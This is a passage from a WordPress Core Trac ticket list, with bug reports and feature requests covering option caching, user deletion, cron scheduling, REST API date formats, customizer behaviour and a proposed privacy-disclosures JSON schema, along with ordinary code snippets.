$wpdb->options WHERE option_name = %s"", $option ) ); if ( is_null( $row ) ) { + + if ( ! wp_installing() ) { + if ( 'yes' === $row->autoload ) { + $alloptions = wp_load_alloptions( true ); + if ( is_array( $alloptions ) && isset( $alloptions[ $option ] ) ) { + unset( $alloptions[ $option ] ); + wp_cache_set( 'alloptions', $alloptions, 'options' ); + } + } else { + wp_cache_delete( $option, 'options' ); + } + } + return false; } }}} but that's not very clean, with that much duplicate code. I'm also open to suggestions if this is even a ""core"" bug, or if it should be the responsibility of the theme/plugin code to make sure the option cache is properly cleared?" emrikol Future Releases 60441 Delete User-> Attribute All Content Doesn't Show Users with Editor Roles Users 6.4.3 normal normal Awaiting Review defect (bug) new dev-feedback 2024-02-05T14:18:33Z 2024-02-05T14:18:33Z "Posted in the Support Forum [https://wordpress.org/support/topic/cant-attribute-content-to-editor-when-deleting-user/ here] - It was suggested this might be a bug so I'm reporting it here. When deleting any user with content and selecting who to attribute that content to, users with editor roles are not shown in the list. I've created a staging site where I disabled all plugins and changed the theme to a default theme, but the issue remains. I've tested this on a couple of websites. I've linked screenshots that show the missing editor user in the dropdown for ""Attribute all content to"" and where the editor user is in the users list. There are 8,005 users (3 admins, 8 editors, 7,993 subscribers); I'm not sure if the number of users is causing the issue. I'm a web designer, not a developer so if this isn't the right place for this let me know. I've been trying to find any documentation of a similar issue, but have come up empty-handed. [[Image(https://snipboard.io/DAZIv8.jpg)]] [[Image(https://snipboard.io/2JwCcj.jpg)]]" sansprinkle Future Releases 53351 Delete Theme Files in Database When Using Delete Option Themes 5.7.2 normal normal Awaiting Review enhancement new dev-feedback 2021-06-07T14:38:28Z 2022-01-28T14:59:14Z "Right now, when a user deletes a theme, the theme files still remain in the database. This can cause future security issues as well as slowdown a site in the future as the database of the website grows. This also makes it difficult for end-users to troubleshoot issues with a theme because it is impossible to install a brand new version of the theme without deleting multiple files the database. When deleting plugins, the plugin data is automatically removed from the database if the plugin developers follow the plugin development standards. The same standard should be applicable to themes downloaded through the theme repository. Users expect a theme to be fully deleted when using the delete option." deborah86 Future Releases 30775 Delete empty post problem wonderboymusic Posts, Post Types 3.3 normal normal defect (bug) reopened dev-feedback 2014-12-19T02:20:16Z 2021-11-27T03:26:30Z "If empty post was created it cannot be deleted Details are here http://arul.ru/pages/writings/delete_post_problem.htm" axdr Future Releases 40355 "Default to ""https://"" in comment author URL field" Comments normal normal Awaiting Review enhancement new dev-feedback 2017-04-04T15:56:58Z 2021-06-07T10:00:12Z "One pet peeve of mine with commenting on other people's WordPresses, is on new sites I haven't commented on yet (or aren't powered by Jetpack Comments) that I need to type `https://` in every Website field. Traditionally, this field is currently empty unless a cookie exists (see: `wp_get_current_commenter()`). Tangentially, recent efforts across the web to SSL all-of-the-things (`\o/`) makes this field an interesting opportunity to gently nudge the web in the direction of `https://` feeling more like the norm than the exception. A plugin can easily enable this (and I'll likely make one today) but I'll offer up the idea here first. Patch imminent." johnjamesjacoby Future Releases 52256 Default hide password field. Users 5.6 normal normal Awaiting Review defect (bug) reopened dev-feedback 2021-01-08T09:39:32Z 2023-10-20T01:13:17Z "Generate password not working when the first click on generate password button. Check different behavior in the below URLs **{siteurl}/wp-admin/user-new.php {siteurl}/wp-admin/profile.php {siteurl}/wp-admin/user-edit.php?user_id={user_id}** Check the video for a better understanding. https://www.loom.com/share/2b91de25ab1447e3bb069738c0d318b8" dilipbheda Future Releases 59639 Dedicated tables for media libary Database normal major Awaiting Review feature request new changes-requested 2023-10-16T20:29:09Z 2023-10-16T20:29:09Z "I suggest to use a dedicated media library table in the database like (wp_media, wp_media_meta) to improve performaces for sites that have many media with many posts. This would lead to an overall improvement in the site's performance." sh1zen Future Releases 56582 Decide how to format multi-line comments in global scope. General normal normal Awaiting Review enhancement new dev-feedback 2022-09-15T15:58:03Z 2022-09-17T07:47:15Z "[https://developer.wordpress.org/coding-standards/inline-documentation-standards/php/ The PHP Documentation Standards] include formats for various types of comment. However, there is no clear description of what to use for multi-line comments in global scope. For example: **3. Requires and Includes** Files required or included should be documented with a summary description DocBlock. Optionally, this may apply to inline `get_template_part()` calls as needed for clarity. However: **5. Inline Comments** Inline comments inside methods and functions should be formatted as follows: **5.2 Multi line Comments** {{{ /* * This is a comment that is long enough to warrant being stretched over * the span of multiple lines. You'll notice this follows basically * the same format as the PHPDoc wrapping and comment block style. */ }}} **Important note:** Multi-line comments must not begin with `/**` (double asterisk) as the parser might mistake it for a DocBlock. Use `/*` (single asterisk) instead. Note: It's quite possible that the inline multi-line format just never expected to have to cover multi-line comments in global scope and was too specific in saying ""inside methods and functions"". This leads to inconsistent formats and unnecessary discussion about what is correct. Let's decide on a format that is appropriate. Should we use `/**`, which is described for other items in global scope, or, as this format typically denotes something extra important (such as requires/includes, docblocks, class members, pre-existing filter docblocks), should we instead use the already existing multi-line comment format of `/*`?" costdev Future Releases 51527 Debugging in Multisite context: list of plugins Site Health normal normal Awaiting Review enhancement new dev-feedback 2020-10-15T06:41:03Z 2020-10-19T16:24:15Z "Hello, On site Health in Multisite context, it could be cool to know if a plugin is site activated or network activated. I'm currently debugging a conflict and I've deactivated all plugins. I'm reactivating one by one with the Site Health Active plugin list, but now I have activated all site plugin, several are network only and I have to re-check all one by one because it's not in the report. Should be good to add in the plugin line ""network activated"" by example as it is in the plugin list" sebastienserre Future Releases 27188 deactivated_plugin behaves improperly Plugins 2.9 normal normal defect (bug) new dev-feedback 2014-02-23T05:36:00Z 2023-10-22T09:59:16Z "Currently, if someone were to hook into `deactivated_plugin`, one should expect that the `$plugin` actually be deactivated. So if, for example, I hook into it with the following code, deactivating Addthis, I don't get the expected behavior. {{{ add_action( 'deactivated_plugin', 'dtat_deactivate_self', 10, 2 ); /** * Deactivate ourself if Premise is deactivated. */ function dtat_deactivate_self( $plugin, $network_deactivating ) { if ( 'addthis/addthis_social_widget.php' == $plugin ) { die( 'Addthis: ' . print_r( is_plugin_active( $plugin ), 1 ) ); } } }}} The plugin still shows that it is active. So if I hook in here to check if plugin has been deactivated, then it fails. Instead, the `deactivated_plugin` hook should appear after the `update_option` call, which is where the plugin is actually deactivated. OR, the docs are wrong and should be updated. Attached is a sample addthis plugin extension that deactivates after Addthis is deactivated by being forced to use `update_option_active_plugins` and `update_option_active_sitewide_plugins`. See [https://gist.github.com/wpsmith/26c2e07370ee8b4c3e3f Github Gist sample plugin] for [http://wordpress.org/plugins/addthis/ Addthis]." wpsmith Future Releases 57145 "Deactivate button ""Copy site info to clipboard"" until health check has completed" Site Health 5.2 normal normal Future Release enhancement new dev-feedback 2022-11-18T09:08:10Z 2023-02-07T06:09:50Z "In the (German) support forums we frequently ask people to provide more information about their website and refer to the button ""Copy site info to clipboard"" in Tools > Site Health > Info. Often users try to react immediately and spontanously click the button before the health check is completed and the status is shown above. This results in an incomplete report, showing the text ""loading …"" for the size of the entire website and some subdirectories. We are then missing an important piece of information to fully evaluate the website. **As an ''enhancement'' I kindly suggest that the button gets grayed out until the Health Check is completed.**" pixolin Future Releases 20634 dbDelta is unforgiving about field declarations Database 1.5 normal normal enhancement new dev-feedback 2012-05-08T03:27:05Z 2019-06-04T19:23:05Z "the variable type is case sensitive: int(22) != INT(22) the mysql type BOOL or BOOLEAN comes back from the db as tinyint(1): tinyint(1) != BOOLEAN Not a huge issue, just annoying. Makes dbDelta fire off unnecessary sql. " SidHarrell Future Releases 59177 dbDelta doesn't handle changing the DEFAULT value of a column from NULL to '' Upgrade/Install normal normal Awaiting Review defect (bug) new dev-feedback 2023-08-23T15:40:02Z 2023-09-05T17:33:33Z "Shouldn't this be a strict comparison https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/upgrade.php#L3064? Otherwise that condition will be false and the column will remain unchanged. " bogdanhapcayardicom Future Releases 51945 Dates in REST API responses are incompatible with date-time JSON schema format Date/Time 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2020-12-05T13:08:06Z 2020-12-07T13:14:31Z "Most date properties of objects in a REST API response (for example the published date of a post) declare a JSON schema format of `date-time`. This is incorrect because `date-time` format requires a timezone identifier and dates in the REST API do not include one. The `date-time` format uses IETF RFC 3339 which differs from ISO 8601. The former requires a timezone identifier, the latter does not. Notably several date field descriptions in the REST API reference ISO 8601, which is also incorrect. Validating a REST API response against its JSON schema therefore fails due to the incorrect date format. == Tested with: * [https://github.com/ajv-validator/ajv AJV] * [https://github.com/java-json-tools/json-schema-validator json-schema-validator] Note that [https://www.jsonschemavalidator.net/ Json.NET Schema] contains [https://github.com/JamesNK/Newtonsoft.Json.Schema/issues/105 a bug which means it incorrectly allows a date without a timezone identifier]. == References: * [https://json-schema.org/draft/2019-09/json-schema-validation.html#rfc.section.7.3.1 JSON schema standard section 7.3.1] where it states that the `date-time` production from IETF RFC 3339 is used for its `date-time` format * [https://tools.ietf.org/html/rfc3339#section-5.6 IETF RFC 3339 section 5.6] where its `date-time` production ABNF is specified == Potential Solutions 1. Switch to using IETF RFC 3339 format for dates, and use the time zone of the site as the timezone identifier 2. Switch to using IETF RFC 3339 format for dates, use `Z` as the timezone identifier, and convert all dates to UTC 3. Remove `date-time` from the JSON schemas and don't change the format or timezone used for dates I think option 1 is preferable but this is technically a breaking change as REST API consumers might not expect a timezone identifier in the date fields even though the `format` declares that one will be present. " johnbillion Future Releases 30465 Dashboard alert if a plugin/theme was removed from WordPress repo Security normal normal Future Release feature request reopened dev-feedback 2014-11-23T14:12:21Z 2024-02-02T10:24:52Z If a plugin/theme has been removed for security reasons, WordPress users with an installed plugin must be informed. Ideally as dashboard notification (on update check?). Otherwise the user will never know that the plugin has a security leak. sergej.mueller Future Releases 54080 Dashboard > My Sites could use a list table for displaying the list of sites Networks and Sites 3.0 normal normal Awaiting Review feature request new dev-feedback 2021-09-07T07:59:55Z 2021-09-08T09:13:36Z "Dashboard > My Sites uses an unfamiliar display when listing a user's sites if compared with the rest of the pages in the administration area such as Posts > All Posts. For consistency, could My Sites make use of a [https://developer.wordpress.org/reference/classes/wp_list_table/ list table]?" henry.wright Future Releases 44641 Customizing Button Text in Custom Media Manager Frame Doesn't Work Anymore antpb Media 4.9.7 normal normal Future Release defect (bug) assigned dev-feedback 2018-07-25T12:16:47Z 2022-01-30T16:52:29Z "= Summary I have a plugin that calls up the Media Manager. I use the ""gallery"" state, and customize the main button text via the `wp.media` arguments. I've noticed a regression. The text in the primary button is no longer overridden by the arguments that I pass. = What I'm Doing (Code is simplified) {{{ var file_frame = wp.media.frame = wp.media({ frame: 'post', state: 'gallery', library : { type : 'image'}, button: {text: 'Edit Image Order'}, // <----- LINE IN QUESTION multiple: true }); file_frame.open(); }}} = What Should Happen The text inside the primary button in the media manager modal should change from ""Create a new Gallery"" to ""Edit Image Order"". [[Image(https://imgur.com/faJevb7)]] = What Actually Happens The button ignores my arguments and retains its default text. [[Image(https://imgur.com/6gLdtLv)]] " Kelderic Future Releases 51522 Customizing : Site Icon CSS Change Customize normal normal Awaiting Review defect (bug) new dev-feedback 2020-10-14T17:11:21Z 2021-06-01T17:59:24Z "When image not exits on provided path display css issue. Please review bellow screenshots. Issue : [[Image(https://prnt.sc/uzb75e)]] Solution : [[Image(https://prnt.sc/uzb622)]] " ravipatel Future Releases 40451 Customizer: Introduce plugin management Customize 4.7.3 normal normal Future Release feature request new dev-feedback 2017-04-14T18:23:53Z 2019-01-15T21:13:52Z "There is currently not a way to discover or upload plugins in the customizer, the only way is in WP Admin. https://codex.wordpress.org/Managing_Plugins#Automatic_Plugin_Installation https://codex.wordpress.org/Managing_Plugins#Manual_Plugin_Installation Themes already have #37661 and #40278." lukecavanagh Future Releases 33139 Customizer on mobile: 'Save & Publish' button may overflow when translated. Customize normal normal Awaiting Review defect (bug) new dev-feedback 2015-07-27T12:50:16Z 2021-05-23T17:46:38Z iseulde Future Releases 33469 Customizer Menus: Restore active menu to a location after selecting and unsetting another menu Customize 4.3 normal normal Awaiting Review enhancement new dev-feedback 2015-08-20T18:40:47Z 2021-05-23T17:52:53Z "When a location is specified for a menu and another menu is assigned to that location in the Customizer, the first menu is removed even if the new settings aren't saved. 1. Assign a menu to a location in the customizer. Click ""Save & Publish"". 1. Assign a different menu to that location, but do not save. 1. Uncheck the location from the second menu. Expected: The previously selected menu for that location should be restored. Actual: The location now has no menu assigned to it." morganestes Future Releases 54119 Customize: Always Show Homepage Settings Customize 4.7 normal normal Future Release enhancement new dev-feedback 2021-09-14T06:58:32Z 2021-09-18T03:01:09Z "== Summary The options at Appearance → Customize → Homepage Settings are contextual. They appear only if the user has at least one published page. I am proposing tp always show Homepage Settings, regardless of the presence of published pages. == Why When you start a new website, the first page you think about is your homepage. So, when you go to look for Homepage Settings, you may not have published a page yet. Or, maybe you start working on your homepage, but it's still a draft. In this scenario, Homepage Settings is not there at all. A user who visited Customize would have checked there and not seen anything related to setting the homepage, so they would not think to check again for it after publishing their first page. If Homepage Settings were to always show, a user would immediately learn where to set a homepage, even if no pages appear in the dropdown yet to select their homepage. It's also worth noting that at Customize → Homepage Settings, you can use the 'Add New Page' option to create a new page using this interface, therefore a user with no pages yet can create their homepage here. By always showing Homepage Settings, this will avoid the confusion a new user faces with Homepage Settings not being present in Customize." donalirl Future Releases 37915 Customize: allow terms to be created in nav menus boonebgorges Customize 4.7 normal normal Future Release enhancement assigned dev-feedback 2016-09-01T20:51:39Z 2021-05-23T23:16:18Z "Follow up to #34923. When setting up initial site structure, in many cases it's as important to be able to create new terms to add to menus as the ability to create posts. For users, the distinction between terms and posts probably isn't immediately clear, so this functionality gap may be confusing. There are several patches on #34923 that contain the needed framework here, but we need the ability to preview terms before we can add support for terms. This depends on #37914. Milestoning for 4.7 now for tracking, but we're waiting for that ticket before we can proceed here." celloexpressions Future Releases 43746 Custom post type single post feed returns a 404 if has_archive is set to false when calling register_post_type() SergeyBiryukov Rewrite Rules 4.9.5 normal normal Future Release defect (bug) reviewing needs-unit-tests 2018-04-12T13:58:17Z 2019-01-16T03:58:48Z "When using {{{register_post_type()}}}, the single post feed returns a 404 if {{{has_archive}}} is set to false. This seems to happen regardless of the value of {{{feeds}}} in the {{{rewrite}}} array. For example: {{{ register_post_type( 'example', array( 'rewrite' => array( 'slug' => 'my-custom-post-type', 'feeds' => true ), 'has_archive' => false ) ); }}} {{{ $ curl -IL https://example.com/my-custom-post-type/some-text/feed/ HTTP/1.1 404 Not Found }}} I'd expect a feed for the post to be built if {{{feeds}}} is set to {{{true}}}. Note I have flushed permalinks." henry.wright Future Releases 36418 Custom MIME type icons lost in WP Media List view Media normal normal Awaiting Review defect (bug) new dev-feedback 2016-04-05T01:18:11Z 2021-10-23T13:22:48Z "The ability to define custom MIME icons has been possible since at least v2.5, by hooking into several filters, one of which is `icons_dir`. `icons_dir` allows you to specify additional directory/uri pairs for the `wp_mime_type_icon` routine to search, ideally adding icon support for additional MIME types. However, going through SVN history, it seems that almost from the beginning of the availability of that hook, there has been a loophole where the additional icon directories are ignored! Specifically: `wp_get_attachment_image_src` calls `wp_mime_type_icon`, which in theory could select a custom icon directory added by the `icon_dirs` hook. It then attempts to fetch width and height information from the selected icon file, but only checks the default wp-includes/images/media directory. Of course, this prevents the custom icons from displaying when fetched through `wp_get_attachment_image_src`." jhorowitz Future Releases 42998 Custom HTML Widget uses widget_text twice in markup Widgets 4.8.1 normal normal Future Release defect (bug) new dev-feedback 2017-12-29T16:34:43Z 2019-01-14T22:33:01Z "In https://core.trac.wordpress.org/changeset/41117, classes were added to the Custom HTML Widget to apply the same styling as the Text Widget in themes. However, there's an extra widget_text class that isn't in the Text Widget. Example markup: Custom HTML widget - The widget_text is on the section and the widget-wrap div. {{{ <section id=""custom_html-2"" class=""widget_text widget widget_custom_html""> <div class=""widget_text widget-wrap""> <h3 class=""widgettitle widget-title"">Custom HTML</h3> <div class=""textwidget custom-html-widget""> Custom HTML Content </div> </div> </section> }}} Text Widget - The widget-wrap div has only that class. {{{ <section id=""text-2"" class=""widget widget_text""> <div class=""widget-wrap""> <h3 class=""widgettitle widget-title"">Text Widget</h3> <div class=""textwidget""> <p>Text Widget Content</p> </div> </div> </section> }}} As a result, any theme that has styled widget_text may have unintended styling issues. " dreamwhisper Future Releases 28904 custom header stores full URL in database Themes 3.9.1 normal normal defect (bug) new dev-feedback 2014-07-14T21:43:16Z 2019-06-04T21:11:53Z "set_header_image is storing the full URL to the custom header in the database. It should only store the relative path in the database and get_header_image should prepend the relative path with get_bloginfo('url'). This makes migrating your site easier. Or you can have a develop and live environment with an easy database sync (my particular issue). '''set_header_image''' Replace: {{{ $choice['url'] = esc_url_raw( $choice['url'] ); }}} With: {{{ $choice['url'] = str_replace( get_bloginfo('url'), '', esc_url_raw( $choice['url'] ) ); }}} or find another method of getting the relative URL '''header_image''' then add the bloginfo URL to header_image (and probably a few other places). {{{ function header_image() { echo esc_url( get_bloginfo('url').get_header_image() ); } }}}" tverlaan Future Releases 36376 current_user_can/has_cap fails when user has multiple roles dd32* Role/Capability normal normal Future Release defect (bug) accepted needs-unit-tests 2016-03-30T17:16:45Z 2019-01-14T04:46:21Z "To replicate the issue, install a role editor. Setup a user with primary role 'author' and secondary role 'customer' (this is a WooCommerce role which has ONLY 'read' access, nothing else). https://dl.dropboxusercontent.com/s/xgucqvvh6no3skm/2016-03-30%20at%2017.49.png?dl=0 You can add a role with only: {{{#!php 'read' => true }}} permissions if you don't have WooCommerce installed. Dump: {{{#!php current_user_can( 'edit_posts' ) }}} It will be false. During get_role_caps() in class-wp-user.php, each role is retrieved and merged. The merge itself doesn't look at values, so if multiple roles have the same 'cap' but different value, these overwrite each other. In my case, edit_posts was true for the author role, but false for customer role. Customer role false overwrote author role true. Since caps only allow access to things if 'true', I think we can safely discard all 'false' caps when getting roles. If false caps are discarded, only true caps are left which works around the issue and fixes user capabilities if they have multiple roles at once. Fix to follow (added array_filter to discard all 'false' caps, allowing us to merge only 'true' caps). Had this reported to us in https://github.com/woothemes/woocommerce/issues/10612#issuecomment-203518038 but wasn't a WooCommerce issue. " mikejolley Future Releases 29247 Crucial caches are not cleared when deleting site Cache API normal normal Future Release defect (bug) new dev-feedback 2014-08-18T03:10:13Z 2022-07-08T15:07:55Z "`clean_blog_cache` clears a bunch of caches, but does not clear any of the options caches. The worst of these is the `alloptions` cache, which allows some behaviour to continue working on deleted sites. For example, `switch_to_blog` will continue to work without error, whereas if the cache is cleared, a `Table 'wordpress.{$prefix}_options' doesn't exist` error will be generated (helping in debugging). Another one that's problematic is the `is_blog_installed` cache. On that note, is there a reason we aren't checking site existence in `switch_to_blog`? (Still investigating this one.)" rmccue Future Releases 57924 Cron fires twice j3gaming Cron API 6.1.1 normal critical Awaiting Review defect (bug) assigned changes-requested 2023-03-14T22:13:57Z 2024-03-05T18:52:31Z "**Problem:** In wp-includes/cron.php _set_cron_array( $cron, $wp_error = false ) is rarely called without every cron task in the $cron parameter. Eventually leading to a random one being deleted by update_option('cron', $cron); **Expected Behaviour:** (Assuming 22 total crons) wp_schedule_event( ... ) runs. Passing in a total count of 23 $crons into _set_cron_array( $crons, $wp_error ); (not sure why it's +1 the total cron count) wp_unschedule_event( ... ) runs. Passing in a total count of 22 $crons into _set_cron_array( $crons, $wp_error ); (I assume the one from the previous call is being removed) Then the cron is executed. Ready for the next time. **The Bug:** RARELY, the incorrect amount is passed, causing a series of events, that deletes the cron entirely. I am debugging this myself as I can make this happen regularly and will continue to log my progress here. I am hoping to fix this myself for the community, I'm also posting to see if anything has been flagged in the past to give me a head start." j3gaming Future Releases 39080 created unittest for is_serialized and is_serialized_string files and move tests into them whyisjake* General 4.7 normal normal Future Release enhancement accepted dev-feedback 2016-12-04T21:32:26Z 2020-04-23T21:58:05Z Move the tests from function.php to separate files and converted to dataprovider ans added move tests pbearne Future Releases 20283 Create new variable or function in $wp_query object to get canonical URL of any site's page Canonical 3.3.1 normal normal enhancement new dev-feedback 2012-03-22T14:42:36Z 2019-06-04T19:22:53Z "For the sake of Search Engine Optimization it's recommended to set canonical URL inside <link rel='canonical'> tag in any site's page. Incorrect URL can exist in search engine index. For example: http://example.com?some_param=some_val&cat=3,4. URL points to categories with id equals 3 and 4, but we have another unnecessary parameter 'some_param'. It's malicious! We must set canonical URL to http://example.com?cat=3,4. So It's advance to have canonical URL generated some way. I propose to set function or variable inside WP_Query class to retrieve canonical URL to any opened page. In WP_Query we have variable WP_Query::query which consists of all necessary parameters for that propose. But we must use $wp_rewrites also. Any thoughts? " egorpromo Future Releases 43748 Create new action edit_user_updated_user similar to edit_user_created_user Users normal normal Awaiting Review enhancement new dev-feedback 2018-04-12T16:11:30Z 2018-05-23T19:45:11Z I would like to see a new action `edit_user_updated_user` similar to the `edit_user_created_user` action so I can run custom actions (i.e., updating an external API with the changed data). macbookandrew Future Releases 27286 create menu page for custom post types General 3.8 normal normal enhancement new dev-feedback 2014-03-05T21:13:20Z 2019-06-04T19:45:30Z Currently, there are dedicated functions for adding new items to a top-level navigation item, such as `add_posts_page`, `add_media_page`, `add_links_page`, and so on. These all act as a wrapper for the `add_submenu_page`. However, there is no dedicated function for custom post types. I am proposing to add a new function called `add_post_type_page` that works in the same way. It's basically a copy of `add_posts_page` with an additional parameter for the registered CPT. norcross Future Releases 42958 create callers for loop functions to accept post id General normal normal Awaiting Review enhancement new dev-feedback 2017-12-21T17:23:36Z 2020-11-17T07:06:03Z "I've always been surprised, why the loop functions (like `the_title`, `the_content`, `the_post_thumbnail` and etc) doesnt have ability to accept post-id as argument. I think that the `get_.....` functions is not replacement in MANY MANY cases, whereas `the_...` functions automatically generate all the needed attributes and tags. using the `get_` function, it is hard to hardcode all those things manually. I suggest to revise once again and why wont WP create callers, like i.e. `_the_content($post_id, [other parameters as of now...])` `_the_title($post_id, [other parameters as of now...])` etc... this will make the things much easier for developers. If you dont believe, see how hard it is to get the same result as `the_content` for specific post id (while outside of loop): {{{ //save global variable $target_post_id = 14; $p=$GLOBALS['post']; //change global variable temporarily, to deceive WP $GLOBALS['post']=get_post($target_post_id); //ONLY NOW call get_the_content $content = get_the_content( $more_link_text='Read more', $strip_teaser=false ); $content = apply_filters( 'the_content', $content ); $content = str_replace( ']]>', ']]>', $content ); //restore the global variable $GLOBALS['post']=$p; echo $content; }}} this is real equivalent of `the_content` when you need to call outside of loop. Is it still arguable?? " tazotodua Future Releases 56164 Create a way to reference function parameter documentation when complex parameters are passed to hooks General normal normal Awaiting Review enhancement new dev-feedback 2022-07-06T17:22:46Z 2022-07-06T17:30:09Z "When a parameter is passed to a filter or action hook that is also passed to the calling function itself, it's common for the `@param` tag on the hook to very briefly explain the parameter. For example, the `$postarr` parameter in `wp_insert_post()` is very complex. Though some modifications to the array are made prior, `$postarr` is ultimately passed to several filter hooks, such as [https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-includes/post.php#L4108-L4124 wp_insert_post_empty_content] and [https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-includes/post.php#L4348-L4376 wp_insert_attachment_data/wp_insert_post_data]. The `@param` tags for these parameters within the filter hook documentation is very brief (""Array of post data."" and ""An array of slashed and sanitized attachment post data, but not processed."" respectively). It would be great to have a way to remain brief within hook documentation in these scenarios while also referring someone to the more detailed, expanded documentation found for the function." desrosj Future Releases 43760 Create a revision when autosaving if the content has changed significantly Autosave normal normal Future Release enhancement new dev-feedback 2018-04-13T13:08:12Z 2019-09-19T20:52:21Z "Sometimes a user may edit a post for hours without saving it. We have autosaves to prevent any data loss. However in some cases there may be an user or a server error and the content may not be submitted or the post may be ""empty"". This doesn't happen often, but is usually devastating for the users. They just lost hours of work! To safeguard against these cases, we can create post revisions when the autosave data is significantly different than the existing post." azaozz Future Releases 51092 Create a JSON schema for Privacy and Other Related Disclosures Privacy normal normal Future Release feature request new dev-feedback 2020-08-21T09:20:52Z 2020-10-07T18:41:45Z "**Background:** The Disclosures Tab is an initiative that is underway in the Core Privacy Team. The aim is to help site owners / admins better understand what information their site (plugins, themes and Core) collects, where the information is stored and where it is sent - and in particular, who it is shared with. We hope to help site owners / admins make more informed privacy choices (e.g. when choosing which plugin to install) and to better understand their risk profile when it comes to privacy. For the most part, the actual ""controlling"" is planned for a sibling plugin, the Permissions Tab, which is not currently intended to be merged into Core, as this will contain more advanced settings. You can read more about the various privacy initiatives here: https://make.wordpress.org/core/2020/08/19/minutes-core-privacy-meeting-19-august-2020/ **The Challenge:** Free-form disclosures in the readme.txt would create a lot of additional work for the plugins review team. Moreover, it makes it near impossible to compare across plugins, or to use the information in any sort of automated process. The Disclosures Tab seeks to standardize the way that plugin, theme authors and Core can disclose privacy and other related concerns to site owners / admins, by creating quasi-""headers"" and limiting the acceptable values for each. **The Solution:** Each plugin, theme and core component can have a file called disclosures.json that could be read by Core (and Meta) using relatively simple REST API functionality. In its current form, the JSON schema does not set any fields as ""required"". As URLs are not one of the six data types accepted by JSON, these types have been set as ""string""s. The format for internal URLs has been set to ""uri-reference"" to allow for relative URLs. Items are not marked as ""uniqueItems"" because we would rather warn (after validation in PHP) than reject the file because of duplicates. **Scope:** This ticket proposes the schema. [] will be created for the validation of the schema by Core (particularly the URLs using PHP). [] will be created for internationalization (WP CLI and WordPress.org). #51156 creates developer documentation. #51144 proposes a UI for site-level privacy disclosures and related settings. {{{#!php <?php { ""$schema"": ""https://core.trac.wordpress.org/ticket/51092"", ""$id"": ""https://example.com/to.be.filled.in.later.disclosures.json"", ""description"": ""The vision of the Disclosures Tab is for site administrators to understand their site's privacy risk profile and to make more informed privacy-related choices as a result. The mission of the Disclosures Tab is to help site administrators understand what information their site collects, where it is stored and where it is sent - and in particular, with whom it is shared."", ""type"": ""object"", ""properties"": { ""info"": { ""description"": ""This section provides information to help identify the code."", ""type"": ""object"", ""properties"": { ""component"": { ""description"": ""One of the following values: plugin, theme, or the specific Core component (e.g. avatar)."", ""type"": ""string"" }, ""slug"": { ""description"": ""The slug, if the code relates to a plugin or a theme."", ""type"": ""string"" }, ""version"": { ""description"": ""Which version of disclosures.json this represents for the individual component."", ""type"": ""string"" }, ""since"": { ""description"": ""The plugin or theme's version number, or the Core version, if the component is a Core component, which introduced the current version of this disclosures.json file. I.e. this should represent the since value."", ""type"": ""string"" } } }, }}} {{{#!php <?php ""licenses"": { ""description"": ""This section contains more information about licensing."" ""type"": ""object"", ""properties"": { ""code"": { ""description"": ""A comma-separated list of URLs linking to the licenses that applies to this component (plugin, theme, or Core component)'s use."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" } }, ""localAssets"": { ""description"": ""A comma-separated list of URLs to the license that applies to the use of each asset that has been included locally. This should include the license of any bundled libraries, as well as the licenses of any images, fonts, etc."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" }, }, ""remoteAssets"": { ""description"": ""A comma-separated list of URLs to the licenses that applies to the use of each asset that is accessed remotely. This should the licenses of any external libraries, as well as the licenses of any images, fonts, etc."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" }, } } }, }}} {{{#!php <?php ""external"": { ""description"": ""This section provides more information relating to the Privacy Policies of the external network sites being called."", ""type"": ""object"", ""properties"": { ""PHP"": { ""description"": ""A comma-separated list of URLs of links to the respective Privacy Policies of the sites to which the external network calls are being made in PHP."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" }, }, ""JavaScript"": { ""description"": ""A comma-separated list of URLs linking to the respective Privacy Policies of the sites to which the external network calls are being made in JavaScript."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" }, }, ""CSS"": { ""description"": ""A comma-separated list of URLs linking to the respective Privacy Policies of the sites to which the external network calls are being made in CSS."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" }, } } }, }}} {{{#!php <?php ""terms"": { ""description"": ""This section contains more information about third party terms and conditions that may apply to use of the software."", ""type"": ""object"" ""properties"": { ""SaaS"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service of any instances of Software as a Service."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" } }, ""externalAPIs"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service of any external API being used."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" } }, ""remoteAssets"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service that applies to the use of each remote asset. This relates to the use of CDNs for images, fonts, etc."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" } }, ""registration"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service that apply to any accounts that need to be registered in order to be able to make use of this component's code."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri"" } } } }, }}} {{{#!php <?php ""openWeb"": { ""description"": ""Details about mechanisms that allow others to obtain information from the site without browsing the website's front end."", ""type"": ""object"", ""properties"": { ""apiEndpoints"": { ""description"": ""A comma-separated list of relative URLs for any internal API endpoints that are created by the code."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri-reference"" } }, ""feeds"": { ""description"": ""A comma-separated list of relative URLs for any internal feeds that are created by the code."", ""type"": ""array"", ""items"": { ""type"": ""string"", ""format"": ""uri-reference"" } } } }, }}} {{{#!php <?php ""clientSide"": { ""type"": ""object"", ""properties"": { ""setsCookiesPHP"": { ""description"": ""The names of any cookies that have been set using PHP."", ""type"": ""array"", ""items"": { ""type"": ""string"", } }, ""setsCookiesJavaScript"": { ""description"": ""The names of any cookies that have been set using JavaScript."", ""type"": ""array"", ""items"": { ""type"": ""string"", } }, ""usesLocalStorage"": { ""description"": ""Whether or not the code makes use of local storage."", ""type"": ""boolean"" } } }, }}} {{{#!php <?php ""communication"": { ""description"": ""This section provides more information about how the software communicates with external parties."", ""type"": ""object"", ""properties"": { ""email"": { ""type"": ""object"", ""properties"": { ""sends"": { ""description"": ""Whether or not the code 